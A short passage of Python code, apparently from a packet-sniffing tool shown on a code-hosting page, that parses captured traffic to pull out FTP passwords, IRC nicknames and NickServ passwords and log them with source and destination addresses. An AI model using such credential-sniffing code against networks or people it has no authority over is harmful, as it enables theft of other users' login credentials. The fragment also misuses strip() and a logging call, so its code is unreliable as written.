|
||||||
elif 'PASS ' in load:
|
|
||||||
pw = load.strip('PASS ')
|
|
||||||
logging.warning('[%s > %s] FTP password:' % (self.src, self.dest), pw)
|
|
||||||
|
|
||||||
def irc(self, port):
|
|
||||||
load = self.load.split('\r\n')[0]
|
|
||||||
|
|
||||||
if 'NICK ' in load:
|
|
||||||
self.ircnick = load.strip('NICK ')
|
|
||||||
logging.warning('[%s > %s] IRC nick: %s' % (self.src, self.dest, self.ircnick))
|
|
||||||
|
|
||||||
elif 'NS IDENTIFY ' in load:
|
|
||||||
ircpass = load.strip('NS IDENTIFY ')
|
|
||||||
logging.warning('[%s > %s] IRC password: %s' % (self.src, self.dest, ircpass))
|
|
Loading…
Add table
Add a link
Reference in a new issue